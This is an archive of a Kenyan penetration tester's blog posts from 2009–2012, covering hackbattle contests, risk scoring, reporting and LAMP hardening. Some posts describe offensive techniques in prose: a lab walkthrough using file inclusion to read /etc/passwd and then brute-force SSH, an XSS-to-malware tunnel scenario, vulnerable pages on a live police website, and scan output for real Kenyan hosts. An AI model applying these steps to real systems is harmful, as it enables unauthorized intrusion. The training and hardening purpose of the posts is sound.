chuks corner

HINTS ABOUT PREHACKBATTLE

2012-02-13T13:07:00.002+03:00

Lately we did set up a pre-hackbattle, which is supposed to end on 14th Feb 2012. I have given the participants clues and hints on breaking into this infrastructure on my tweeter feed, @chuksjonia, see also the tag, #hackbattle

See as below.

1. clue number 1, jenniffer.kimari at gmail dot com
2. clue number 2, Q: do you do backups? A: Yes sir, mysqldump!
3. clue number 3, scholastika.muraguri at gmail dot com
4. clue number 4, best flaw, top 5 2007 OWASP

Clue number five should be published by 14th Feb in the morning. Now what i have learned is that most of the pentesters in KE rely a lot on tools. PENTEST IS NEVER AUTOMATED.

So a lot of participants are really rushing into breaking in, which is where they are loosing control. Am finding other people scanning up the webapps, others bruteforcing and they lack the idea of the infrastructure.

I needed everyone who is doing this game to think like a blackhat, this game is a Covert forensics surveillance. So what happens if an Agency asks you to do such a job for them, do you start scanning, or do you learn the target first?

One thing i would like to clarify is take your time, open one screen to be running a movie beside you, don't rush. Take naps when you do this, get ideas, understand how the admin and the developer created the infrastructure. Learn the OS the server is running, do threat intelligence as much as you can about the application.

Don't start shooting in a dagger fight. So its around 36 hrs remaining until we get a winner, which i hope we find soon.

Good luck to all playing, and we meet at the finish line.

./Chucks

PRE-HACKBATTLE PRONON00B

2012-02-09T15:46:00.003+03:00

Pre-hackbattle set to start 0000hrs Friday 10th, and this will open up the gates for later battle this year.

Currently we don't have many contestants, but we will work with what we have.

We are like 11 hrs to go before we start, and we should have some results by 14th of February.

Cheers,

./Chucks

PRE-HACKBATTLE CODENAME -ProofNoN00b

2012-02-06T13:14:00.004+03:00

So we are starting the pre-hackbattle this week and we are still waiting for registrations from members of Security Forum, though its taking long. We are expecting to start on 10th of this February, and we should be able to announce the winners by 14th this Feb.

Competitors will be expected to send 500/- bob on Mpesa to Kennedy
Kasina, 0720-269-850, to register for the competition. An email with
the IPs will be sent via email to the registered members.

The funds collected will be used to pay for the infrastructure since we don't have sponsorship, the servers bought for this came straight from my pocket. Extra amount, we are thinking of giving it to Children Home around Nairobi.

Rules:

1. Any personnel involved with the infrastructure set up will be
disqualified for the contest
2. Every registered competitor will be needed to have a full report of
his actions
3. Any changes of the major file to mess up with the checksum, will be
considered as a disqualification.
4. Any type of DOS will have your IPs blocked
5. Teamwork is allowed.
6. Winners will have to show how they hacked on major hackbattle later
this year.
7. The registration will only be allowed from EAC members.
8. Trying to social engineer moderators will be considered as a cool :)
9. How to win, hack the infrastructure the fastest

Remember, ANY ACTIONS OUTSIDE OF THESE RULES WILL RESULT IN DISQUALIFICATION.

One more Pentest LAB before end of Year

2011-11-27T11:06:00.003+03:00

I got another privilege to set up another exam and where there were two servers this time on the WAN, with one firewalling or filtering traffic to the main Box. The main had a DB and an Apache server, and other services like sshd and ftpd. This Server as per recon, it was mean for FileService/Databases.

So above is simulation of the Network. I will soon be posting on how this infrastructure would have been compromised.

One of the exams i had set this October 2011

2011-11-14T11:15:00.033+03:00

The other day i was training EN1 and 2 and i had to set an exam that would cover much of what the student had learnt. So here it goes. The trick to passing the exam is what we call Threat Intelligence. Alot of pentesters out there have no idea how to do it, so i had found it important for my students to have a glimpse of what they are expected to do when they get back to their organizations.

First of all, the most important part of the Assessment is reconassaince.

Reconnaissance gives you a chance to get more information about the target and from here we start understanding the OS version, and what is running on the system. As you can see, we have port 80 open with Apache running on it. So lets load the website on our browser and see what we can view.

So we get to see we have a website running on this server, we can try login or even check it out, or even scan it with nikto which is located in /pentest/web/nikto in BackTrack.

Nikto gives us more information about the website and we get find some urls which are good for understanding the version of the webapp, license.txt and also some info disclosure via test.php as seen below.

So, by now we know that the OS is Linux and also we know the host name and the path to which the website is, the Apache version and also the php version. We do also know the exact version of the kernel running. We were also able to pick the version and the type of the web application which is called 1024CMS.

Now we need to do Threat Intelligence against the target running 1024CMS, and we visit exploit db website.

And we search for 1024cms in exploitdb database and you should find as below.

So lets go ahead and open the first exploit we have on the exploit-db website and see if it will run on the Target box.

As you can see, this vulnerability exploits a a flaw in code called Local File Inclusion, which is common on LAMP systems. With this we can download any file on the system that we have access to. One of the file interesting files is /etc/passwd and so we try to download from the box via the vulnerability as seen below.

As above you can see we are able to download the /etc/passwd and now we have a list of users for this box, as seen below;
# cat passwd
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin webmaster:x:501:501::/home/webmaster:/bin/bash webadmin:x:502:502::/home/webadmin:/bin/bash michele:x:503:503::/home/michele:/bin/bash avant:x:504:504::/home/avant:/bin/bash oscar:x:505:505::/home/oscar:/bin/bash

Now with the users we can start bruteforcing for their passwords from our password list, or rather the wordlist and we use xhydra.

And xhdra should gain a password in a few minutes.

Now we have a password, all we need to do is get into the box via 22 as we had that information from our Info gathering stage and we should see the zip file in the / of the system, we copy it to michele home directory since we dont have permissions to write in slash linux skeleton directory. and we should have the password to root.

LIFE IN INFORMATION SECURITY- PART 1

2011-08-20T14:26:00.003+03:00

Information security is one career that a lot of Techis out there have mistaken what it entails a lot. I have seen some people think that because they can run nmap on an MS box they can do VA assessments for an organization. Others think coz they can develop code they can actually hack. Others come straight from college and join a security company, handed in some company questionnaires and shown how to scare clients when they need to do an audit, only to find they are asking for SAM files from a unix admin, LULZ. Am not hating but I think I need to talk about this.

Personally my skill-set is penetration testing, but how I got here was nasty. I started with repairing computers and mobile devices back in 1999/2000, then went into structured cabling, later I was administering domains and huge networks and I had to script code and I ended up indulging into development. As I went on, security became a huge interest and there was no guys in Nairobi I could get advice from, so I had to do research and heavy studies by myself.

With 11 years in this career am still learning new things everyday.

So here are some aspects to those who want to do security at higher level. By higher level I mean, working in those institutions where Security is taken seriously:

a) IT Background, Research and studies
b) Health and fitness
c) Personal Security
d) Patience
e) Independence
f) Intelligence
g) Confidentiality

As days go by, I will write on these aspects above.

With all regards,

./Chucks

Calculating PSR and the Reason to

2011-08-10T17:49:00.006+03:00

So what is PSR, what does it stand for? In short P means Probability, S is Severity and R is relevance. This metric looks at the probability of the vulnerabilities found and how they can be exploited, with ease or with loads of trial and error. Its also looks at the severity of the impact they will cause to the organization in case exploited and then the relevance of the asset to the organization.

Below is a table we can calculate the P = Probability with.

Probability	The likelihood that the risk will take place:
5 - Very High	Is almost certain (P > 95%)
4 - High	Is very likely (65% < P ≤ 95%)
3 - Medium	Is likely (35% < P ≤ 65%)
2 - Low	Is not very likely (5% < P ≤ 35%)
1 - Very Low	Is unlikely (P ≤ 5%)

So for the auditor to estimate the probability he has to consider several factors,

a) The knowledge requires to have a working exploit on the specified flaw. So the more the knowledge required the higher the probability.
b) The resource required to attack and exploit the flaw will also major out on the probability, the fewer the resource the higher the probability.
c) The duration required to exploit the flaw, if the intruder would take a short time, then the probability goes higher.
d) Also how important the target is, e.g a Banking server, where most attackers would wont to fully exploit flaws makes the P vary alot. The more attractive the system is the higher the probability
e) How well the asset is protected, physical and operation wise, if lower the protection the higher the probability.
f) Environmental, political, weather also affects the probability variations

So probability is a way of looking at a view of the like hood a risk might happen, while severity will evaluate the level of impact on the asset and organization if it takes place.

Severity	The risk taking place will cause:
5 - Very High	Major impairment
4 - High	Very severe impairment
3 - Medium	Severe impairment
2 - Low	Less severe impairment
1 - Very Low	Almost no impairment

So for the auditor to estimate the severity he has to consider several factors,
a) The degree of impairment of the reliability of the process results or information as well as the systems or related environment supported by the asset.
b) Degree of impairment of the assets performance.
c) The impairment of the quality of services, systems and information.

Thirdly is the relevance of the asset, where the importance of it is valued and what it supports to the business/organization.

Relevance	The asset’s impairment:
5 - Very High	May affect the entire organization and losses will be extremely high
4 - High	May affect one or more of the organization’s businesses and losses will be high
3 - Medium	May affect a part of the organization’s business and losses will be considerable
2 - Low	May affect a small and localized part of the organization and losses will be low
1 - Very Low	May affect a very small and localized part of the organization’s business and losses will be minimal

So now we can multiply the values to calculate the PSR of an asset after we have defined them.

Risk Level	Possible PSR Values
Very Low	1, 2, 3, 4, 5, 6
Low	8, 9, 10, 12, 15, 16
Medium	18, 20, 24, 25, 27, 30
High	32, 36, 40, 45, 48, 50
Very High	60, 64, 75, 80, 100, 125

So all the PSR calculation sum up to 125.

./Chucks

Vulnerability and PT reporting

2011-07-30T15:48:00.003+03:00

Lately i have been engaged with alot of Assessments, and reporting has been a major factor for the Clients bosses upstairs. So reporting is one thing that techis always hate doing, which i do too, but for the sake of these non-technical folks we need to make sure reports are done and well interpreted to the point they understand it even before a presentation.

Now, the reporting matrix should atleast be on color indexing and good diagrams, even if it means to use some Visio to draw how an attacker would penetrate from the Internal or External attack. Terms like Ease of Exploitation, Potential Impact, Ease of Identification helps the management to know the overall risk of the vulnerability and how to fix it, with its criticality associated.

Sometimes departments involved in fixing the problem or vulnerability tend to overstate the issue or deny its capability so at to drag the whole assessments or not look bad to the management, so the evidence has to be well shown, and illustrated.

The methodology used, and type of tools and timelines are also important aspects. The message has to be clear and to the point.

BELATED HACKBATTLE 2010

2011-04-13T11:17:00.003+03:00

The dates for the belated Hackbattle2010 have been set, as from
25th to 29th of April and 30th will be the presentation dates. We will
have hackbattle 2011 at the end of the year.

The scenario will be two servers Natted to an FW on public IPs, and
two workstations behind the DMZ. The registered guys will have to hack
their way into the network, and collected files, they will be asked
with the right MD5 checksums. The first collector of all checksums,
from both servers and one workstation, will be the winner of the
contest.

To register, send email to hackbattle.ke at gmail.com, with your name,
the hacker handle that you will want to use. and the IP range.

The contest is hosted by ihub, so all sponsors will be needed to
contact Bernard Owuor Adongo , and also
me with jgichuki at inbox d0t com. For those who had already asked
about the sponsorship, i will be sending you the information later in
the day.

Rules:

1. Any techi involved with the infrastructure set up will be
disqualified for the contest
2. Every registered techi will be needed to have a full report of his actions
3. Any changes of the file to mess up with the checksum, will be
considered as a disqualification.
4. Any type of DOS will have your IPs blocked
5. Teamwork is allowed, but remember you will have to share the prizes
6. Winners will have to show how they hacked on 30th, in ihub just
before the Ubuntu party.
7. The registration will only be allowed from EAC members.
8. Trying to social engineer moderators will be considered as a cool
9. How to win, hack the infrastructure the fastest

Remember, ANY ACTIONS OUTSIDE OF THESE RULES WILL RESULT IN DISQUALIFICATION.

Yours,

./Chucks

KenyaPolice Website Vulnerabilities

2011-03-06T21:34:00.008+03:00

So, a new post showed up on Security list about how to get the relevant personnel know about the vulnerabilities that KP Website would be having. http://lists.my.co.ke/pipermail/security/2011-March/001725.html

If you check for obvious vulnerabilities with your browser e.g Cross Site scripting, SQL Injection, hidden directories, its much easier with lack of WAF (Web Application Firewall), and bad coding tactics.

With such obvious flaws, we can actually get a sense of how Government infrastructure is, and how vulnerable applications running confidential information are, e.g Civil Servant information, NSSF information, Health Organization, Ongoing Corruption investigations etc. With such information being in susceptible vulnerable infrastructures, in case of a cyber attack, its would be easy to overwhelm and bypass the Governments intergrity and confidentiality.

Back to KP website, pages like report_a_crime.asp, lost.asp, site_search.asp, crime_reports_processor.asp, contactus.asp and several others are vulnerable to serious security flaws, especial the Top Ten Owasp Risks. This is due to non-sanitized pages with page variables like, category, details, name, email_address, telephone, txtAnswer etc.

Security Assessments for Kenyan Goverment Infrastracture should be enforced, and use of Information Security Policies should be introduced. MOD or any other law enforcement organization should at least have a Task Force that does tests once in a while by assuming cyber attacks, and such common vulnerabilities on KP webserver should no longer exist (very embarrasing flaws).

NB, i have not disclosed to anyone how to inject or exploit these vulnerabilities, KP has not been informed yet, so the site is still vulnerable. Please also note that, any information i have shown here should NOT be misused, if so, use at your own risk.

Posted by Chucks

Nairobi War-Drives

2011-03-03T20:18:00.005+03:00

Its been long since i did some war driving in Nairobi.

So this weekend, am planning to start with Upperhill to Hurligham looking for WEP and Open wireless Access points. If you wonna join in please shot me a mail jgichuki at inbox d0t com.

We may also do some wireless pentest to show risks to the public and why insecure wireless can be a external threat to your organization.

Keep tuned in,

./Chucks

Why PT without FW/IPS Evasion is not reliable Part 2

2011-02-17T01:29:00.019+03:00

So, part 2 is here, i have received several mails to blog on this.

This attack is simulated with a Cross Site Scripting vulnerability, example www.bank.co.ke. So what happens is the attacker discovers a flaw on the website where user inputs are not sanitized. Www.bank.co.ke, sits in the banks Server Farm, inside the DMZ well protected by the Cooperate Firewall. In the Server farm are DB servers, Mails Servers, Domain servers and the Web server etc.

So what happens is the hackers injects code into the website and convinces a techi support user to check the link out. The link has full website address, but the other injection parts are encoded for disguise, and the IDPS (Intrusion Detection Prevension System) sensors does not pick that when going to his email.

The attacker has a remote zombie which has an exe embedded to a js script, so he will send an encode format of an url that sounds like below (this needs to be encoded to bypass Intrusion sensors and filters)

The character // --> is meant to comment out anything that gets generated up to that point. Then we have the next step of the payload where a script is hosted on attacking server which has the exploit ready for the client. Its downloaded and is executed on the Users PC. From there, we have an SSLED tunnel, from inside cooperate LAN to zombie server via a command prompt. So the attacker can control the PC from his laptop via the zombie through a tunnel which is not detected at the FW and IDPS centre.
There is so many other ways to inject malicious code on websites, which can fully trick users to engage with the exploits without their will. These attacks will need to be obfuscated to avoid AVs and Intrusion Sensors

Questions and comments can be done below. If you wish to know how far more the exploitation can go, please comment or mail me, i will be happy to recreate a full post as part 3.

Yes, An old Friend scanned the site...

2011-02-16T19:06:00.009+03:00

Was with one of my friends the other day and he had just set up a financial website, and he was telling me that they will be doing serious stuff with several Financial institutions all over Africa.

So the discussion about security came up, and boldly said, "Old Friend from India did a Penetration Test on it by, scanning it, now its safe and secure" So he actually did not even do this for his comfort but wanted to pass Compliance test from some banks and CBK. I don't like pointing fingers, but i think the CBK, should also regulate how such Assessment and Audits are done. CBK should update their mandate on such matters.

So the box , LAMPs, several organizations use, has several vulnerabilities or rather non-hardened LAMPs. Hackers will always look for such default installs and if found will probe for more information and use such intel to exploit further, especially if they see a gain, financially or Infrastructure-wise. So lets look at a few tips on how to harden the LAMPs. These tips are just 10% of what you should do to protect a LAMP. Otherwise, if they have not been done, you have a 0% security on your webserver.

HIDE YOU APACHE & PHP INFORMATION.

No one needs to know which version of apache or php your are running, when browing your site, except hackers. So inside httpd.conf, change the ServerSignature from On to Off. Below there is ServerTokens, change from OS to PROD. Also inside php.ini file, there is expose_php which is on, turn it off, also change SafeMode to ON from Off. There are also some dangerous configurations which need to be turned off, in disable_functions=

After that restart Apache.

INSTALL WEB APPLICATION FIREWALL.

You will need to install a WAF, to protect against online login bruteforces, web directory bruteforce, and other forms of attacks. PHPIDS is another solution which needs to be installed. PHPIDS is capable of detecting attacking pattern strings, e.g File Inclusions either remote or local attacks, SQLIs, XSS etc.

REMOVE SPECIAL FILES/FOLDERS.

Sometimes developers like to have files like phpinfo. These files expose paths to web folders, server kernels and internal IPs. Was doing a Pentest last year where i found one. Prior to that, i had no idea that the webservers had connectivity to internal business networks. The internal security personnel had no idea either, so during the test, i found one on a server and it had an internal connectivity. That's when i released the Admins had deployed internal IPs to the network for easier access of the Webservers. So these phpinfo files, remove them. Other folders are like /phpmyadmin, /mysql, /admin etc which need to be blocked from the public.

BLOCK DIRECTORY LISTING.

Directory listing is on immature mistake developers and webmasters make. Most of the Apache servers will have these turned on. Inside httpd.conf, edit Options Indexes FollowSymLinks to Options -Indexes FollowSymLinks.

The other security fixes are much more exercised by Security Personnel in your organization. These will include Code analysis, Checklists, Top Owasp risks test, Penetration testing, Vulnerability Assessments etc.

Any questions, comments, please post below.

Regards,

./Chucks

Why PT without FW/IPS Evasion is not reliable Part 1

2011-02-10T11:34:00.008+03:00

Many attackers out there, Cyber armies, black hats, Investigators etc, who want data from your Network/Infrastructure will stop at nothing to try evade all Access Controls that cooperates have. Due to this, its the responsibility of security companies hired to demonstrate this vulnerability and try to recommend many ways of blocking the security flaws that can be used for FW/IPDS evasion.

On the picture shown is one example. Here, an attacker with a laptop sitting somewhere sends a Malware to a user inside the network. So all he will need to do is to wait for the user to open his document that was attached on mail, and he will run code on the victim and a tunneled control channel is applied via the Firewalls to his box. This is well achieved via ssl-tunneling.

I have taken sometime to test this attack on several banks in Kenya, and it was well achieved unlike try outs in Fast world countries, which needs more recon of IPDS sensors and Firewalls. I will be continuing this with Part two in the coming week.

For questions, check below.

Regards,

Chucks

If They scan and paste, why not just buy the tool!

2011-01-30T21:58:00.002+03:00

As an Infosec specialist, you might have worked with tools like Nessus, Appscan, Acunetic etc. Well these tools kind of give a pentester an easy time during an engagement.

Organization throughout the world who have security departments that test vulnerabilities in a daily basis use the same tools for easier scans on their subnets, but they also contract Security Specialists for a view above the scope. Its more money on their budgets so they always expect a better addition of the value they are procuring for.

The other day, i was looking at some reports done by a very powerful company that specializes with AV (Anti-virus)and also on with PT(Penetration Testing). From such AV cooperations i was expecting real good reports but all i could see were copy pastes from Nessus plugins. Many question unanswered there......

One of the questions i asked myself was, why not just buy a scanner and leave it running for your report?

Another question that truly comes up is, will the bad guys be doing the same?

Anyone who has answers, please post below.

./Chuks

Before PT, Call-inject

2011-01-16T10:16:00.003+03:00

Just before a PT Op, clients who understand PT and VA will tend to call, maybe via management or even with their Technical Security Departments, and will ask you as the pentester several questions, maybe about Owasp, methodologies, tools, etc During this session, i tend to listen and also ask questions cause they tend to also lead to Pre-Infor gathering just before the projects.

This actually worked some months ago last year, when doing a PT on a big organization which was using Windows Domain Controllers and was also reachable via the internet. This wasnt to be figured out before the operation, it was to, after negotiations and the start of work.

Companies should be aware of such errors/flaws/human weaknesses, due to the fact that, the pentesters who dont win the bids tend not to be unhappy, and may have discovered that information via the phone-calls.

./Chuks

playing tigerteam at the end of SecureICT talks

2010-10-07T17:51:00.003+03:00

Tigerteam, a TV show about pentesting, released back into 2007 was screened at SecureICT conference on 6th, in the evening. Tigerteam, composes of Nickerson Chris, Ryan Jones and Luke McOmie, shows them break into targets they are hired to by their clients. Attacks include exploitation of Human vulnerability, technological attacks, physical attacks etc.

./Chuks

Bad Security Service adds up sum to Losses after a threat succeeds

2010-10-05T17:37:00.005+03:00

One funny thing i have learned is that several Security Vendors dont really test security effectively even when contracted to do so. Others may say its more of jurisdiction purposes or the scope, but i think if you are paid to minimize risks for a corporation you should do it at the best value possible.

This comes to the topic pentest. A lot of the vendors don't understand what pentest is and thus, that affects their clients, so leaving them at a greater risk due to the fact they leave, telling them they are secure and so letting them, let gaurd down.

One of the Pentest report i got hold of was explaining how there were open ports which they dint or were not able to exploit but had holes as seen from a scanner. To keep it short, should a pentest report have False positives. No, its should have info on entries that were used to get into the target.

They problem is that the above may require a team which is qualified, talented, intelligent and advanced in the field. Lemmie know your thoughts

./Chuks

Kenya Banking infoinsecurity

2010-09-11T11:04:00.003+03:00

Hi Guys.

SecureICT dates were changed to 5th and 6th of October.

I will also be doing a presentation on the above topic, where my main concerns will be on Internet banking, Mobile Banking, Bank Vendors, Physical and operational Security in banking, and several other topics which over the year 2010 i experienced.

This was inspired after a Head of Information security in a certain bank told me that they rely on TRUST.

See you there.

./Chuks

SecureICT 2010

2010-09-01T22:18:00.003+03:00

Awesome, seven days to SecureICT.PanAfric from 8th to 9th this Month. John Long, with Google Hacking, Lucy Munga from E and Y with Information Risk and Assurance Services. Dr Bitange will be opening the conference, hope to see you all there.

./Chuks

Info Security in 2010, my predections

2010-01-13T17:16:00.007+03:00

Its a new year again, and we heard so much noise around and there, eg the big Google hacked by China hackers and several governments getting heavily ready on Cyber security. My predictions will heavily involve where i come from, Kenya.

Kenyan Banks will start taking Information security serious and security assessment will be actively deployed as part of security policies.

Kenyan media will investigate more on the topic and we will see several blog post and stories being written.

Cyber crime will heighten up as Mobile Banking and Internet Banking becomes deployed and high tech crime will be cause of the new venture for armed robbery.

Mungiki and other Secs will take Cyber terror, spying and espionage for more gain as the year proceeds.

A strong Police Cyber Crime unit to be deployed as the year rolls out

Compiled by Chuks

./Chuks

Computer search, scan the internet

2009-11-27T14:05:00.007+03:00

There is this new tool done by Achillean, you can follow him in twitter, http://twitter.com/achillean that enables to search for system across the internet by issuing command searches on his site, http://shodan.surtri.com/. At the time of this blog post, the app is still running at BETA stage, which acts like an nmap search of systems online.

You can use keywords like, country code, port number, host name , etc.

Doing a scan of some systems here in Kenya, Apache webservers, having port 80 open, and registered as a co.ke would have a key search as, apache:KE port:80 hostname:co.ke

The first page...

Results 1 - 8 of about 8 for apache:KE port:80 hostname:co.ke
41.220.233.2
Added on 06.11.2009

mail.kdn.co.ke

HTTP/1.1 200 OK
Date: Fri, 06 Nov 2009 18:22:43 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Fri, 26 Jun 2009 10:04:55 GMT
ETag: "1fd811b-f5-46d3d78dc9fc0"
Accept-Ranges: bytes
Content-Length: 245
Connection: close
Content-Type: text/html; charset=UTF-8

41.207.64.4
Added on 06.11.2009

mtandao.infinet.co.ke

HTTP/1.1 200 OK
Date: Fri, 06 Nov 2009 18:27:55 GMT
Server: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Fri, 06 Nov 2009 18:27:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=703d3af1219ebc948ad8a46d0b29eac5; path=/
Connection: close
Content-Type: text/html

41.207.64.2
Added on 06.11.2009

forum.infinet.co.ke
simba.infinet.co.ke
mail.afolke.com

HTTP/1.1 200 OK
Date: Fri, 06 Nov 2009 18:30:51 GMT
Server: Apache/2.2.8 (FreeBSD) mod_ssl/2.2.8 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.5 with Suhosin-Patch
X-Powered-By: PHP/5.2.5
Connection: close
Content-Type: text/html

41.203.219.3
Added on 06.11.2009

41-203-219-3.onecom.co.ke

HTTP/1.1 200 OK
Date: Fri, 06 Nov 2009 18:25:29 GMT
Server: Apache/2.0.63 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=lagspeoct4op95bv0j1l047go5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

41.209.15.2
Added on 04.11.2009

uu-041-209-015-002.uunet.co.ke

HTTP/1.1 200 OK
Date: Wed, 04 Nov 2009 11:48:19 GMT
Server: Apache/2.2.8 (Linux/SUSE)
X-Powered-By: PHP/5.2.5
Set-Cookie: 7a8fd2d9906865c24807e3d46bd56c5a=-; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 04 Nov 2009 11:48:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

41.207.64.1
Added on 15.10.2009

kifaru.infinet.co.ke

HTTP/1.1 302 Found
Date: Thu, 15 Oct 2009 04:37:13 GMT
Server: Apache/2.2.3 (Red Hat)
Location: https://kifaru.infinet.co.ke/
Connection: close
Content-Type: text/html; charset=iso-8859-1

41.209.15.1
Added on 12.10.2009

zomulogistics.co.ke
childrensgarden.or.ke
mail.saku.or.ke
mail.shujaa.co.ke
mail.tulipe.co.ke
mail.mobinfo.co.ke
tulipe.co.ke
mobinfo.co.ke

HTTP/1.1 302 Found
Date: Mon, 12 Oct 2009 21:59:23 GMT
Server: Apache/2.2.9 (Debian) mod_jk/1.2.26 PHP/5.2.6-1+lenny3 with Suhosin-Patch
Location: http://shujaa.co.ke/root/?q=node/1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1

76.12.158.75
Added on 22.07.2009

axistransline.co.ke

HTTP/1.1 200 OK
Date: Wed, 22 Jul 2009 23:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 09 Jul 2009 20:09:10 GMT
ETag: "44b000b-1c44-6dc3e580"
Accept-Ranges: bytes
Content-Length: 7236
Connection: close
Content-Type: text/html; charset=UTF-8

Have fun, and dont mess up the Internet.

./Chuks

Banks and goverments going to Security through obscurity

2009-11-22T12:29:00.007+03:00

Security through obscurity is something i have seen a lot of organizations using in Kenya that is Private and Government as well. But as this goes on, does it mean private and confidential data can never be compromised by the bad guys. I was doing a infosec assessment with a bank the other day and amazingly i found out that they were hiding systems behind their firewalls which were really vulnerable, but if you scanned their block very carefully without triggering the Cisco PiX you would get loads of info.

A nmap scan to the mail server reported:

PORT STATE SERVICE VERSION
25/tcp open smtp Cisco PIX sanitized smtpd
Service Info: Device: firewall

One thing the administrators didnt know is that, if you have such a disclosure just after scanning a mailserver, every attacker would know what he is dealing with. So any further attacks as from there gets blocked by an IPS which also blocks that IP and the attacker is aware of such information. Some of these organizations rarely inspects intrusions or perform incident handling so if attackers sees such info, then does research on what he has found and comes back after one year, the administrators or even the security team have no track of such attacks that must have happened 12 months ago from same range of IPs, then it becomes hard to protect such infrastructure.

This becomes a serious issue and with good luck the attacker may get into very valuable info.

After i realized that a Cisco PIX was blocking me, i decided to switch to another ISP network, and i ran through KDN and this time i was doing stealth scans going for the whole block and found mailservers and webservers, internet banking servers all gaping open to the internet. Amazingly some of these servers had MySql ports open with user root and password r00t. Several routers were also exposed to the internet,

xxx.xxx.81.190):
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet Cisco router
79/tcp open finger Cisco fingerd
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
465/tcp filtered smtps
808/tcp filtered ccproxy-http
1002/tcp filtered windows-icfw
3918/tcp filtered unknown
4004/tcp filtered unknown
34573/tcp filtered unknown
Service Info: OS: IOS; Device: router

So as far as security through obscurity is concerned, i think its not a good option especially for fanancial institutions. For government institutions its also a bad deal, since if you look at network infrastructures like KRA, such systems aren't carefully protected, such that if there is an attack, and incidents like deletion of information or change of information etc, then there would be lack of Integrity and availability of data to authorized users and to the tax payers.

./Chuks

Str0ke passes away

2009-11-04T18:12:00.003+03:00

Str0ke founder of Milworm just passed away after cardiac arrest this morning, an issue he had since childhood.

This was the reason his site and tweeter feed wasn't updated in quite a while.

RIP str0ke, and God be with you and your family.

./Chuks

hey

2009-11-04T08:29:00.002+03:00

Hi guys.

I haven't been able to blog lately, busy with work and organizing the hack battle. You can also follow me in twitter @chuksjonia to know what happening with me in the world of Infosec and i will follow u right back.

There is also some education stuff that will be blogged soon so keep check this site.

regards

./Chuks

Malicious documents and their attempts to attacks

2009-09-28T13:58:00.005+03:00

Recently been doing ongoing research on using malware when pentesting. A lot of Banks and networks are still vulnerable to these attacks and they still dont know it. Its very important for any pentester who is already in an engagement with such a client, to find such holes before the unethical do it.

So, most of the documents downloaded or attached in an email e.g PDFs, DOCs, PPTs, etc that is infected will have a shellcode, that will do the following: Will have a trojan downloaded from a rogue webserver somewhere in the internet. Then it will write the executable in your system32 folder, and execute the file.

This attack will only work if the user is a local administrator, or has administration privileges to write to system32, and this where you will find none of the windows workstation will work without the admin user.

There are several ways to secure this, that i may have to specify in the next blog entry. Keep tuned.

./Chuks

MetaSploit Unleashed

2009-09-22T13:56:00.002+03:00

Hi.

For those who haven't heard, the Metasploit course has been released and for you to get the full course, u need to visit offensive security site for more details. The public course material can be found here, http://www.offensive-security.com/metasploit-unleashed

./Chuks

SecureICT day two

2009-09-09T17:30:00.004+03:00

Second day at secureICT.

SecureICT day one

2009-09-09T15:27:00.007+03:00

Hi guys, This is how day one was at SecureICT

WHY WE MIGHT NEED A BETTER SECURITY ASSESSMENT VENDOR

2009-08-22T19:49:00.007+03:00

THE SCAMS

During the mail list last week, a member brought up this issue whereby i was also involved in the consultancy in a company situated in Ghana.
http://lists.my.co.ke/pipermail/security/2009-August/000566.html

